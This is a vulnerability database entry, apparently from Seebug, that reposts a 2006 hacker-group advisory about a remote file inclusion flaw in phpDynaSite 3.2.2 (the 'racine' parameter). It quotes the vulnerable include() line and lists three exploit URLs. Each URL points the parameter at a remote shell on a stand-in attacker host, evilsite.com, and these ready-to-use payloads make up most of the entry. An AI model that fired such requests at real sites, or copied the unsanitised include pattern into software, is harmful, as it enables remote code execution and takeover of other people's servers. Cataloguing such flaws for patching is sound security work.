phpDynaSite <= 3.2.2 (racine) Remote File Include Vulnerabilities

2006-11-05T00:00:00
ID SSV:5479
Type seebug
Reporter Root
Modified 2006-11-05T00:00:00

Description

No description provided by source.

                                        
                                            
                                                **********************************************************************************************************
                                                    WwW.Deltahacking.NeT
                                                
**********************************************************************************************************

* dynasite3.2.2

* Class = Remote File Inclusion ;
 
* Download = http://jaist.dl.sourceforge.net:80/sourceforge/phpdynasite/dynasite3.2.2.tar.gz

* Found by = Dr.Pantagon (rezayavari2006@yahoo.com)

-------------------------------------------------------------------------------------------------------------------


- Vulnerable Code

     include($racine."connection.php");

++++++++++++++++++++++++++++++++++++++++++++

- Exploit:


    http://[target]/[path]/function_log.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/function_balise_url.php?racine=http://evilsite.com/shell?
    http://[target]/[path]/connection.php?racine=http://evilsite.com/shell?


------------------------------------------------------------------------------------------------------------------

Gr33tz:  Dr.Torojan

**************************************************************************************************************